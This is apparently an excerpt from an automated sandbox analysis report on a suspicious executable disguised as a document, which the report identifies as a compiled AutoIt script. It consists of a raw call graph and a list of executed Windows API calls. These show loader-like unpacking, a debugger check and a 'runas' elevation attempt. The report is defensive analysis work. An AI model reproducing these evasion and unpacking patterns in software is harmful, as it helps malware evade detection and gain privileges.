104780->104793 104789 7210f1 Mailbox 104781->104789 104783 721230 104783->104777 105233 75d520 86 API calls 4 library calls 104783->105233 104786 73010a 48 API calls 104786->104793 104787 71fa40 378 API calls 104787->104793 105232 75d520 86 API calls 4 library calls 104789->105232 104791 78b583 105231 75d520 86 API calls 4 library calls 104791->105231 104793->104760 104793->104762 104793->104766 104793->104767 104793->104769 104793->104770 104793->104772 104793->104775 104793->104776 104793->104777 104793->104780 104793->104783 104793->104786 104793->104787 104793->104789 104793->104791 104794 74a599 InterlockedDecrement 104793->104794 105088 71f6d0 104793->105088 105160 76af26 104793->105160 105220 770bfa 104793->105220 105223 721620 59 API calls Mailbox 104793->105223 105226 76ee52 82 API calls 2 library calls 104793->105226 105227 76ef9d 90 API calls Mailbox 104793->105227 105228 75b020 48 API calls 104793->105228 105229 76e713 378 API calls Mailbox 104793->105229 104794->104793 104797->103755 104798->103755 104799->103755 104800->104674 104801->104676 104802->104713 104803->104681 104804->104707 104805->104713 104806->104726 104807->104713 104808->104713 104809->104716 104810->104722 104811->104724 104812->104722 104813->104713 104814->104713 104815->104709 104816->104726 104817->104726 104818->104705 104819->104726 104820->104726 104871 72dd92 GetFileAttributesW 104821->104871 104876 76f79f 104824->104876 104826 770c1e 104826->104736 104828 760218 104827->104828 104829 76020d 104827->104829 104831 7184a6 81 API calls 104828->104831 105048 71cdb4 48 API calls 104829->105048 104832 760232 104831->104832 104833 760254 104832->104833 104834 76033c 104832->104834 104844 760366 104832->104844 104835 7184a6 81 API calls 104833->104835 104836 713f9b 136 API calls 104834->104836 104842 760260 _wcscpy _wcschr 104835->104842 104837 76034d 104836->104837 104838 760362 104837->104838 104840 713f9b 136 API calls 104837->104840 104839 7184a6 81 API calls 104838->104839 104838->104844 104841 76039b 104839->104841 104840->104838 104984 73297d 104841->104984 104846 7602b2 _wcscat 104842->104846 104848 760284 _wcscat _wcscpy 104842->104848 104844->104736 104845 7603bf _wcscat _wcscpy 104856 7184a6 81 API calls 104845->104856 104847 7184a6 81 API calls 104846->104847 104849 7602d0 _wcscpy 104847->104849 104850 7184a6 81 API calls 104848->104850 105049 757c0c GetFileAttributesW 104849->105049 104850->104846 104852 7602f0 __NMSG_WRITE 104852->104844 104853 7184a6 81 API calls 104852->104853 104854 76031c 104853->104854 105050 756b3f 77 API calls 4 library calls 104854->105050 104858 760456 104856->104858 104857 760330 104857->104844 104987 757334 104858->104987 104860 760476 104861 72dd84 3 API calls 104860->104861 104862 760485 104861->104862 104863 7184a6 81 API calls 104862->104863 104866 7604b6 104862->104866 104864 76049f 104863->104864 104993 75c890 104864->104993 104867 713e39 84 API calls 104866->104867 104867->104844 104868->104738 104869->104735 104870->104736 104872 72dd89 104871->104872 104873 784a7d FindFirstFileW 104871->104873 104872->104736 104874 784a8e 104873->104874 104875 784a95 FindClose 104873->104875 104874->104875 104912 7184a6 104876->104912 104878 76f7db 104900 76f81d Mailbox 104878->104900 104932 770458 104878->104932 104880 76fa7c 104881 76fbeb 104880->104881 104886 76fa86 104880->104886 104968 770579 89 API calls Mailbox 104881->104968 104884 76fbf8 104885 76fc04 104884->104885 104884->104886 104885->104900 104945 76f5fb 104886->104945 104887 7184a6 81 API calls 104905 76f875 Mailbox 104887->104905 104892 76faba 104959 72f92c 104892->104959 104895 76fad4 104965 75d520 86 API calls 4 library calls 104895->104965 104896 76faee 104898 713320 48 API calls 104896->104898 104901 76fb05 104898->104901 104899 76fadf GetCurrentProcess TerminateProcess 104899->104896 104900->104826 104902 7214a0 48 API calls 104901->104902 104911 76fb2f 104901->104911 104904 76fb1e 104902->104904 104903 76fc56 104903->104900 104908 76fc6f FreeLibrary 104903->104908 104966 770300 105 API calls _free 104904->104966 104905->104880 104905->104887 104905->104900 104905->104905 104963 7728d9 48 API calls _memmove 104905->104963 104964 76fc96 60 API calls 2 library calls 104905->104964 104907 7214a0 48 API calls 104907->104911 104908->104900 104911->104903 104911->104907 104967 71d89e 50 API calls Mailbox 104911->104967 104969 770300 105 API calls _free 104911->104969 104913 7184be 104912->104913 104927 7184ba 104912->104927 104914 785592 __i64tow 104913->104914 104915 7184d2 104913->104915 104916 785494 104913->104916 104923 7184ea __itow Mailbox _wcscpy 104913->104923 104970 73234b 80 API calls 3 library calls 104915->104970 104917 78557a 104916->104917 104918 78549d 104916->104918 104971 73234b 80 API calls 3 library calls 104917->104971 104918->104923 104924 7854bc 104918->104924 104920 73010a 48 API calls 104922 7184f4 104920->104922 104925 71caee 48 API calls 104922->104925 104922->104927 104923->104920 104926 73010a 48 API calls 104924->104926 104925->104927 104928 7854d9 104926->104928 104927->104878 104929 73010a 48 API calls 104928->104929 104930 7854ff 104929->104930 104930->104927 104931 71caee 48 API calls 104930->104931 104931->104927 104933 71b8a7 48 API calls 104932->104933 104934 770473 CharLowerBuffW 104933->104934 104972 76267a 104934->104972 104938 71d3d2 48 API calls 104939 7704ac 104938->104939 104979 717f40 48 API calls _memmove 104939->104979 104941 7704c3 104942 71a2fb 48 API calls 104941->104942 104943 7704cf Mailbox 104942->104943 104944 77050b Mailbox 104943->104944 104980 76fc96 60 API calls 2 library calls 104943->104980 104944->104905 104946 76f616 104945->104946 104950 76f66b 104945->104950 104947 73010a 48 API calls 104946->104947 104949 76f638 104947->104949 104948 73010a 48 API calls 104948->104949 104949->104948 104949->104950 104951 770719 104950->104951 104952 770944 Mailbox 104951->104952 104957 77073c _strcat _wcscpy __NMSG_WRITE 104951->104957 104952->104892 104953 71cdb4 48 API calls 104953->104957 104954 71d00b 58 API calls 104954->104957 104955 7184a6 81 API calls 104955->104957 104956 7345ec 47 API calls _W_store_winword 104956->104957 104957->104952 104957->104953 104957->104954 104957->104955 104957->104956 104983 758932 50 API calls __NMSG_WRITE 104957->104983 104961 72f941 104959->104961 104960 72f9d9 VirtualAlloc 104962 72f9a7 104960->104962 104961->104960 104961->104962 104962->104895 104962->104896 104963->104905 104964->104905 104965->104899 104966->104911 104967->104911 104968->104884 104969->104911 104970->104923 104971->104923 104974 7626a4 __NMSG_WRITE 104972->104974 104973 7626e2 104973->104938 104973->104943 104974->104973 104975 762763 104974->104975 104976 7626d8 104974->104976 104975->104973 104982 72dfd2 60 API calls 104975->104982 104976->104973 104981 72dfd2 60 API calls 104976->104981 104979->104941 104980->104944 104981->104976 104982->104975 104983->104957 105051 7329c7 104984->105051 104988 757341 _wcschr __ftell_nolock 104987->104988 104989 73297d __wsplitpath 47 API calls 104988->104989 104992 757357 _wcscat _wcscpy 104988->104992 104990 757389 104989->104990 104991 73297d __wsplitpath 47 API calls 104990->104991 104991->104992 104992->104860 104994 75c89d __ftell_nolock 104993->104994 104995 73010a 48 API calls 104994->104995 104996 75c8fa 104995->104996 104997 714bce 48 API calls 104996->104997 104998 75c904 104997->104998 105077 75c6a0 104998->105077 105000 75c90f 105001 7141a7 83 API calls 105000->105001 105002 75c922 _wcscmp 105001->105002 105003 75c946 105002->105003 105004 75c9f3 105002->105004 105084 75ce59 94 API calls 2 library calls 105003->105084 105085 75ce59 94 API calls 2 library calls 105004->105085 105007 75c94b 105008 73297d __wsplitpath 47 API calls 105007->105008 105011 75c9fc 105007->105011 105013 75c974 _wcscat _wcscpy 105008->105013 105009 71417d 64 API calls 105010 75ca18 105009->105010 105012 71417d 64 API calls 105010->105012 105011->104866 105014 75ca28 105012->105014 105016 73297d __wsplitpath 47 API calls 105013->105016 105015 71417d 64 API calls 105014->105015 105017 75ca43 105015->105017 105021 75c9bf _wcscat 105016->105021 105018 71417d 64 API calls 105017->105018 105019 75ca53 105018->105019 105020 71417d 64 API calls 105019->105020 105022 75ca6e 105020->105022 105021->105009 105021->105011 105023 71417d 64 API calls 105022->105023 105024 75ca7e 105023->105024 105025 71417d 64 API calls 105024->105025 105026 75ca8e 105025->105026 105027 71417d 64 API calls 105026->105027 105028 75ca9e 105027->105028 105080 75d009 GetTempPathW GetTempFileNameW 105028->105080 105030 75caaa 105031 734129 117 API calls 105030->105031 105033 75cabb 105031->105033 105032 734274 __fcloseall 83 API calls 105034 75cb80 105032->105034 105033->105011 105035 71417d 64 API calls 105033->105035 105043 73373e 80 API calls 105033->105043 105046 75cb75 105033->105046 105036 75cb86 DeleteFileW 105034->105036 105037 75cb9a 105034->105037 105035->105033 105036->105011 105038 75cc2e CopyFileW 105037->105038 105041 75cba4 105037->105041 105039 75cc44 DeleteFileW 105038->105039 105040 75cc56 DeleteFileW 105038->105040 105039->105011 105081 75cfc8 CreateFileW 105040->105081 105044 75c251 118 API calls 105041->105044 105043->105033 105045 75cc19 105044->105045 105045->105040 105047 75cc1d DeleteFileW 105045->105047 105046->105032 105047->105011 105048->104828 105049->104852 105050->104857 105052 7329e2 105051->105052 105055 7329d6 105051->105055 105075 73889e 47 API calls __getptd_noexit 105052->105075 105054 732b9a 105056 7329c2 105054->105056 105076 737aa0 8 API calls __wmakepath_s 105054->105076 105055->105052 105065 732a55 105055->105065 105070 73a9fb 47 API calls __wmakepath_s 105055->105070 105056->104845 105058 732ac2 105060 732b21 105058->105060 105061 732ae0 105058->105061 105060->105052 105060->105056 105062 732b31 105060->105062 105061->105052 105069 732afc 105061->105069 105072 73a9fb 47 API calls __wmakepath_s 105061->105072 105074 73a9fb 47 API calls __wmakepath_s 105062->105074 105064 732b12 105073 73a9fb 47 API calls __wmakepath_s 105064->105073 105065->105052 105065->105058 105071 73a9fb 47 API calls __wmakepath_s 105065->105071 105069->105052 105069->105056 105069->105064 105070->105065 105071->105058 105072->105069 105073->105056 105074->105056 105075->105054 105076->105056 105086 7340da GetSystemTimeAsFileTime 105077->105086 105079 75c6af 105079->105000 105080->105030 105082 75d004 105081->105082 105083 75cfee SetFileTime CloseHandle 105081->105083 105082->105011 105083->105082 105084->105007 105085->105021 105087 734108 __aulldiv 105086->105087 105087->105079 105089 71f708 105088->105089 105094 71f77b 105088->105094 105090 71f712 105089->105090 105091 78c4d5 105089->105091 105092 71f71c 105090->105092 105110 78c544 105090->105110 105095 78c4e2 105091->105095 105096 78c4f4 105091->105096 105101 78c6a4 105092->105101 105109 71f72a 105092->105109 105155 71f741 105092->105155 105093 71fa40 378 API calls 105142 71f787 105093->105142 105097 78c253 105094->105097 105094->105142 105237 76f34f 105095->105237 105266 76c235 378 API calls Mailbox 105096->105266 105260 75d520 86 API calls 4 library calls 105097->105260 105275 71c935 48 API calls 105101->105275 105102 78c585 105111 78c590 105102->105111 105112 78c5a4 105102->105112 105103 78c264 105103->104793 105104 78c507 105107 78c50b 105104->105107 105104->105155 105267 75d520 86 API calls 4 library calls 105107->105267 105109->105155 105276 74a599 InterlockedDecrement 105109->105276 105110->105102 105122 78c569 105110->105122 105114 76f34f 378 API calls 105111->105114 105269 76d154 48 API calls 105112->105269 105113 78c45a 105265 71c935 48 API calls 105113->105265 105114->105155 105116 78c5af 105131 78c62c 105116->105131 105141 78c5d1 105116->105141 105119 78c7b5 105120 78c7eb 105119->105120 105279 76ef9d 90 API calls Mailbox 105119->105279 105281 71d89e 50 API calls Mailbox 105120->105281 105121 71f84a 105126 78c32a 105121->105126 105138 71f854 105121->105138 105268 75d520 86 API calls 4 library calls 105122->105268 105261 71342c 48 API calls 105126->105261 105129 78c793 105130 7184a6 81 API calls 105129->105130 105145 78c79b __NMSG_WRITE 105130->105145 105271 75afce 48 API calls 105131->105271 105132 78c7c9 105136 7184a6 81 API calls 105132->105136 105134 71f8bb 105134->105103 105134->105113 105134->105155 105262 74a599 InterlockedDecrement 105134->105262 105264 76f4df 378 API calls 105134->105264 105135 732241 48 API calls 105135->105142 105149 78c7d1 __NMSG_WRITE 105136->105149 105137 7214a0 48 API calls 105140 71f8ab 105137->105140 105138->105137 105140->105134 105143 71f9d8 105140->105143 105270 75a485 48 API calls 105141->105270 105142->105093 105142->105121 105142->105134 105142->105135 105142->105143 105156 71f770 Mailbox 105142->105156 105263 75d520 86 API calls 4 library calls 105143->105263 105145->105119 105278 71d89e 50 API calls Mailbox 105145->105278 105146 78c63e 105272 72df08 48 API calls 105146->105272 105149->105120 105280 71d89e 50 API calls Mailbox 105149->105280 105151 78c5f6 105154 7244e0 378 API calls 105151->105154 105153 78c647 Mailbox 105273 75a485 48 API calls 105153->105273 105154->105155 105155->105119 105155->105156 105277 76ee52 82 API calls 2 library calls 105155->105277 105156->104793 105158 78c663 105274 723680 378 API calls 2 library calls 105158->105274 105370 722570 105160->105370 105162 76af48 CoInitialize 105163 76af67 VariantInit 105162->105163 105164 76af61 CoUninitialize 105162->105164 105165 76b185 105163->105165 105166 76af8f 105163->105166 105164->105163 105169 73010a 48 API calls 105165->105169 105167 76af96 105166->105167 105168 76b164 105166->105168 105171 76b005 105167->105171 105172 76af99 105167->105172 105170 7184a6 81 API calls 105168->105170 105173 76b196 105169->105173 105175 76b171 105170->105175 105182 76b01c 105171->105182 105183 76b11d 105171->105183 105176 76afa0 105172->105176 105177 76b23a VariantClear 105172->105177 105174 76b1b9 105173->105174 105178 7184a6 81 API calls 105173->105178 105194 76b0db 105174->105194 105389 75a6f6 103 API calls 105174->105389 105179 7184a6 81 API calls 105175->105179 105180 7184a6 81 API calls 105176->105180 105177->104793 105181 76b1a9 105178->105181 105179->105165 105184 76afad 105180->105184 105372 751050 105181->105372 105384 71cdb4 48 API calls 105182->105384 105189 7184a6 81 API calls 105183->105189 105188 7184a6 81 API calls 105184->105188 105192 76afc3 105188->105192 105190 76b122 105189->105190 105193 7184a6 81 API calls 105190->105193 105191 76b021 105210 76b045 105191->105210 105385 71cdb4 48 API calls 105191->105385 105195 7184a6 81 API calls 105192->105195 105197 76b134 105193->105197 105194->105177 105390 76c235 378 API calls Mailbox 105194->105390 105196 76afd5 105195->105196 105199 7184a6 81 API calls 105196->105199 105200 7184a6 81 API calls 105197->105200 105203 76afe9 105199->105203 105204 76b148 105200->105204 105201 73010a 48 API calls 105213 76b06d 105201->105213 105202 76b036 105202->105210 105386 71cdb4 48 API calls 105202->105386 105383 76c604 378 API calls 3 library calls 105203->105383 105388 76c604 378 API calls 3 library calls 105204->105388 105208 76b0b8 105208->105194 105387 75a6f6 103 API calls 105208->105387 105210->105201 105211 76b000 105211->105177 105212 76b15f 105212->105194 105213->105208 105215 76b089 105213->105215 105216 7184a6 81 API calls 105213->105216 105217 7184a6 81 API calls 105215->105217 105216->105215 105218 76b0a5 105217->105218 105219 751050 16 API calls 105218->105219 105219->105208 105221 76f79f 129 API calls 105220->105221 105222 770c0a 105221->105222 105222->104793 105223->104793 105224->104770 105225->104775 105226->104793 105227->104793 105228->104793 105229->104793 105230->104777 105231->104789 105232->104777 105233->104767 105234->104762 105235->104769 105236->104779 105238 71d3d2 48 API calls 105237->105238 105240 76f389 Mailbox 105238->105240 105239 76f3a9 105305 71d89e 50 API calls Mailbox 105239->105305 105240->105239 105241 76f3e1 105240->105241 105242 76f3cd 105240->105242 105288 71c935 48 API calls 105241->105288 105244 717e53 48 API calls 105242->105244 105246 76f3df 105244->105246 105247 76f429 105246->105247 105289 76cdb5 378 API calls 105246->105289 105282 76cd12 105247->105282 105249 76f410 105249->105247 105252 76f414 105249->105252 105251 76f44b 105254 76f457 105251->105254 105255 76f4a2 105251->105255 105290 75d338 86 API calls 4 library calls 105252->105290 105254->105239 105258 76f476 105254->105258 105256 76f34f 378 API calls 105255->105256 105257 76f421 Mailbox 105256->105257 105257->105155 105291 71ca8e 105258->105291 105260->105103 105261->105134 105262->105134 105263->105156 105264->105134 105265->105155 105266->105104 105267->105156 105268->105156 105269->105116 105270->105151 105271->105146 105272->105153 105273->105158 105274->105155 105275->105155 105276->105155 105277->105129 105278->105119 105279->105132 105280->105120 105281->105156 105283 76cd21 105282->105283 105284 76cd46 105282->105284 105285 71ca8e 48 API calls 105283->105285 105284->105251 105286 76cd2d 105285->105286 105306 76c8b7 105286->105306 105288->105246 105289->105249 105290->105257 105292 71cad0 105291->105292 105293 71ca9a 105291->105293 105294 71cae3 105292->105294 105295 71cad9 105292->105295 105298 73010a 48 API calls 105293->105298 105366 71c4cd 105294->105366 105296 717e53 48 API calls 105295->105296 105302 71cac6 105296->105302 105299 71caad 105298->105299 105300 784f11 105299->105300 105301 71cab8 105299->105301 105300->105302 105303 71d3d2 48 API calls 105300->105303 105301->105302 105304 71caee 48 API calls 105301->105304 105302->105257 105303->105302 105304->105302 105305->105257 105308 76c914 105306->105308 105309 76c8f7 105306->105309 105364 76c235 378 API calls Mailbox 105308->105364 105309->105308 105310 76cc61 105309->105310 105311 76c934 105309->105311 105312 76cc6e 105310->105312 105313 76cca9 105310->105313 105311->105308 105342 74abf3 105311->105342 105360 72d6b4 48 API calls 105312->105360 105313->105308 105316 76ccb6 105313->105316 105315 76c964 105315->105308 105317 76c973 105315->105317 105362 72d6b4 48 API calls 105316->105362 105328 76c9a1 105317->105328 105346 74a8c8 105317->105346 105319 76cc87 105361 7597b6 89 API calls 105319->105361 105323 76ccd6 105363 75503c 91 API calls Mailbox 105323->105363 105325 76cadc VariantInit 105332 76cb11 _memset 105325->105332 105329 76ca4a 105328->105329 105356 74a25b 106 API calls 105328->105356 105329->105325 105330 76ca86 VariantClear 105329->105330 105330->105329 105331 76caa5 SysAllocString 105330->105331 105331->105329 105333 76cb8e 105332->105333 105334 76cbb4 105332->105334 105357 76c235 378 API calls Mailbox 105333->105357 105358 75a6f6 103 API calls 105334->105358 105336 76cbad 105338 76cc41 VariantClear 105336->105338 105339 76cc52 105338->105339 105339->105284 105340 76cbce 105340->105338 105359 75a6f6 103 API calls 105340->105359 105343 74ac04 __NMSG_WRITE 105342->105343 105345 74ac16 105342->105345 105344 713bcf 48 API calls 105343->105344 105343->105345 105344->105345 105345->105315 105348 74a8f2 105346->105348 105347 74a9ed SysFreeString 105351 74a9f9 105347->105351 105348->105347 105349 74aa7e 105348->105349 105350 74a90a 105348->105350 105348->105351 105349->105350 105349->105351 105352 74aad9 SysFreeString 105349->105352 105353 74aac9 lstrcmpiW 105349->105353 105350->105328 105351->105350 105365 74a78a RaiseException 105351->105365 105352->105349 105353->105352 105355 74aafa SysFreeString 105353->105355 105355->105351 105356->105328 105357->105336 105358->105340 105359->105340 105360->105319 105361->105339 105362->105323 105363->105339 105364->105339 105365->105351 105367 71c4e7 105366->105367 105368 71c4da 105366->105368 105369 73010a 48 API calls 105367->105369 105368->105302 105369->105368 105371 72257b Mailbox 105370->105371 105371->105162 105391 751255 105372->105391 105375 7510a4 CoCreateInstance 105376 7510e1 105375->105376 105379 7510c2 105375->105379 105377 7510ec SetErrorMode GetProcAddress 105376->105377 105376->105379 105378 75110b 105377->105378 105382 751112 105377->105382 105396 7513d1 6 API calls 105378->105396 105379->105174 105381 751180 SetErrorMode 105381->105379 105382->105381 105383->105211 105384->105191 105385->105202 105386->105210 105387->105194 105388->105212 105389->105194 105390->105177 105397 74a857 105391->105397 105394 75109c 105394->105375 105394->105379 105395 751285 IIDFromString 105395->105394 105396->105382 105398 74a872 CLSIDFromProgID 105397->105398 105399 74a86c 105397->105399 105400 74a8b5 CLSIDFromString 105398->105400 105401 74a880 105398->105401 105399->105398 105402 74a8c1 105400->105402 105401->105402 105403 74a884 ProgIDFromCLSID 105401->105403 105402->105394 105402->105395 105403->105402 105404 74a899 lstrcmpiW 105403->105404 105405 74a8a7 105404->105405 105406 74a8aa CoTaskMemFree 105404->105406 105405->105406 105406->105402 105407 781e8b 105412 72e44f 105407->105412 105411 781e9a 105413 73010a 48 API calls 105412->105413 105414 72e457 105413->105414 105415 72e46b 105414->105415 105420 72e74b 105414->105420 105419 731b2a 52 API calls __cinit 105415->105419 105419->105411 105421 72e463 105420->105421 105422 72e754 105420->105422 105424 72e47b 105421->105424 105452 731b2a 52 API calls __cinit 105422->105452 105425 71d3d2 48 API calls 105424->105425 105426 72e492 GetVersionExW 105425->105426 105427 717e53 48 API calls 105426->105427 105428 72e4d5 105427->105428 105453 72e5f8 105428->105453 105433 7829f9 105435 72e55f GetCurrentProcess 105470 72e70e LoadLibraryA GetProcAddress 105435->105470 105437 72e59e 105464 72e694 105437->105464 105438 72e5ec GetSystemInfo 105441 72e5c9 105438->105441 105440 72e576 105440->105437 105440->105438 105444 72e5d7 FreeLibrary 105441->105444 105445 72e5dc 105441->105445 105444->105445 105445->105415 105446 72e5e4 GetSystemInfo 105448 72e5be 105446->105448 105447 72e5b4 105467 72e437 105447->105467 105448->105441 105451 72e5c4 FreeLibrary 105448->105451 105451->105441 105452->105421 105454 72e601 105453->105454 105455 71a2fb 48 API calls 105454->105455 105456 72e4dd 105455->105456 105457 72e617 105456->105457 105458 72e625 105457->105458 105459 71a2fb 48 API calls 105458->105459 105460 72e4e9 105459->105460 105460->105433 105461 72e6d1 105460->105461 105471 72e6e3 105461->105471 105475 72e6a6 105464->105475 105468 72e694 2 API calls 105467->105468 105469 72e43f GetNativeSystemInfo 105468->105469 105469->105448 105470->105440 105472 72e55b 105471->105472 105473 72e6ec LoadLibraryA 105471->105473 105472->105435 105472->105440 105473->105472 105474 72e6fd GetProcAddress 105473->105474 105474->105472 105476 72e5ac 105475->105476 105477 72e6af LoadLibraryA 105475->105477 105476->105446 105476->105447 105477->105476 105478 72e6c0 GetProcAddress 105477->105478 105478->105476 105479 7129c2 105480 7129cb 105479->105480 105481 7129e9 105480->105481 105482 712a48 105480->105482 105519 712a46 105480->105519 105483 7129f6 105481->105483 105484 712aac PostQuitMessage 105481->105484 105486 782307 105482->105486 105487 712a4e 105482->105487 105489 712a01 105483->105489 105490 78238f 105483->105490 105491 712a39 105484->105491 105485 712a2b NtdllDefWindowProc_W 105485->105491 105528 71322e 16 API calls 105486->105528 105492 712a53 105487->105492 105493 712a76 SetTimer RegisterClipboardFormatW 105487->105493 105495 712ab6 105489->105495 105496 712a09 105489->105496 105533 7557fb 60 API calls _memset 105490->105533 105499 7822aa 105492->105499 105500 712a5a KillTimer 105492->105500 105493->105491 105497 712a9f CreatePopupMenu 105493->105497 105494 78232e 105529 72ec33 378 API calls Mailbox 105494->105529 105526 711e58 53 API calls _memset 105495->105526 105502 712a14 105496->105502 105503 782374 105496->105503 105497->105491 105506 7822af 105499->105506 105507 7822e3 MoveWindow 105499->105507 105524 712b94 Shell_NotifyIconW _memset 105500->105524 105510 712a1f 105502->105510 105511 78235f 105502->105511 105503->105485 105532 74b31f 48 API calls 105503->105532 105504 7823a1 105504->105485 105504->105491 105513 7822d2 SetFocus 105506->105513 105514 7822b3 105506->105514 105507->105491 105509 712a6d 105525 712ac7 DeleteObject DestroyWindow Mailbox 105509->105525 105510->105485 105530 712b94 Shell_NotifyIconW _memset 105510->105530 105531 755fdb 70 API calls _memset 105511->105531 105512 712ac5 105512->105491 105513->105491 105514->105510 105517 7822bc 105514->105517 105527 71322e 16 API calls 105517->105527 105519->105485 105522 782353 105523 713598 67 API calls 105522->105523 105523->105519 105524->105509 105525->105491 105526->105512 105527->105491 105528->105494 105529->105510 105530->105522 105531->105512 105532->105519 105533->105504 105534 84b090 105535 84b0a0 105534->105535 105536 84b1ba LoadLibraryA 105535->105536 105540 84b1ff VirtualProtect VirtualProtect 105535->105540 105537 84b1d1 105536->105537 105537->105535 105539 84b1e3 GetProcAddress 105537->105539 105539->105537 105542 84b1f9 ExitProcess 105539->105542 105541 84b264 105540->105541 105541->105541 105543 781eed 105548 72e975 105543->105548 105545 781f01 105564 731b2a 52 API calls __cinit 105545->105564 105547 781f0b 105549 73010a 48 API calls 105548->105549 105550 72ea27 GetModuleFileNameW 105549->105550 105551 73297d __wsplitpath 47 API calls 105550->105551 105552 72ea5b _wcsncat 105551->105552 105565 732bff 105552->105565 105555 73010a 48 API calls 105556 72ea94 _wcscpy 105555->105556 105557 71d3d2 48 API calls 105556->105557 105558 72eacf 105557->105558 105568 72eb05 105558->105568 105560 72eae0 Mailbox 105560->105545 105561 71a4f6 48 API calls 105563 72eada _wcscat __NMSG_WRITE _wcsncpy 105561->105563 105562 73010a 48 API calls 105562->105563 105563->105560 105563->105561 105563->105562 105564->105547 105582 73aab9 105565->105582 105569 71c4cd 48 API calls 105568->105569 105570 72eb14 RegOpenKeyExW 105569->105570 105571 72eb35 105570->105571 105572 784b17 RegQueryValueExW 105570->105572 105571->105563 105573 784b30 105572->105573 105574 784b91 RegCloseKey 105572->105574 105575 73010a 48 API calls 105573->105575 105576 784b49 105575->105576 105577 714bce 48 API calls 105576->105577 105578 784b53 RegQueryValueExW 105577->105578 105579 784b86 105578->105579 105580 784b6f 105578->105580 105579->105574 105581 717e53 48 API calls 105580->105581 105581->105579 105583 73abc6 105582->105583 105584 73aaca 105582->105584 105592 73889e 47 API calls __getptd_noexit 105583->105592 105584->105583 105590 73aad5 105584->105590 105586 73abbb 105593 737aa0 8 API calls __wmakepath_s 105586->105593 105589 72ea8a 105589->105555 105590->105589 105591 73889e 47 API calls __getptd_noexit 105590->105591 105591->105586 105592->105586 105593->105589 105594 4d723b0 105608 4d70000 105594->105608 105596 4d72483 105611 4d722a0 105596->105611 105598 4d724ac CreateFileW 105600 4d72500 105598->105600 105602 4d724fb 105598->105602 105601 4d72517 VirtualAlloc 105600->105601 105600->105602 105601->105602 105603 4d72535 ReadFile 105601->105603 105603->105602 105604 4d72550 105603->105604 105605 4d712a0 13 API calls 105604->105605 105606 4d72583 105605->105606 105607 4d725a6 ExitProcess 105606->105607 105607->105602 105614 4d734b0 GetPEB 105608->105614 105610 4d7068b 105610->105596 105612 4d722a9 Sleep 105611->105612 105613 4d722b7 105612->105613 105615 4d734da 105614->105615 105615->105610

                                                        Executed Functions

                                                        Function 0071374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0071376D
                                                          • Part of subcall function 00714257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,00000000,00000001,00000000), ref: 0071428C
                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 0071377F
                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,007D1120,C:\Users\user\Desktop\DOC092024-0431202229487.exe,007D1124,?,?), ref: 007137EE
                                                          • Part of subcall function 007134F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0071352A
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00713860
                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,007C2934,00000010), ref: 007821C5
                                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 007821FD
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00782232
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007ADAA4), ref: 00782290
                                                        • ShellExecuteW.SHELL32(00000000), ref: 00782297
                                                          • Part of subcall function 007130A5: GetSysColorBrush.USER32(0000000F), ref: 007130B0
                                                          • Part of subcall function 007130A5: LoadCursorW.USER32(00000000,00007F00), ref: 007130BF
                                                          • Part of subcall function 007130A5: LoadIconW.USER32(00000063), ref: 007130D5
                                                          • Part of subcall function 007130A5: LoadIconW.USER32(000000A4), ref: 007130E7
                                                          • Part of subcall function 007130A5: LoadIconW.USER32(000000A2), ref: 007130F9
                                                          • Part of subcall function 007130A5: RegisterClassExW.USER32(?), ref: 00713167
                                                          • Part of subcall function 00712E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00712ECB
                                                          • Part of subcall function 00712E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00712EEC
                                                          • Part of subcall function 00712E9D: ShowWindow.USER32(00000000), ref: 00712F00
                                                          • Part of subcall function 00712E9D: ShowWindow.USER32(00000000), ref: 00712F09
                                                          • Part of subcall function 00713598: _memset.LIBCMT ref: 007135BE
                                                          • Part of subcall function 00713598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713667
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                        • String ID: C:\Users\user\Desktop\DOC092024-0431202229487.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"}
                                                        • API String ID: 4253510256-2293759984
                                                        • Opcode ID: 2d46e8860e69e6ac36ff18df8a8a3087b92a57e74384365f257cb6ab2f5253b1
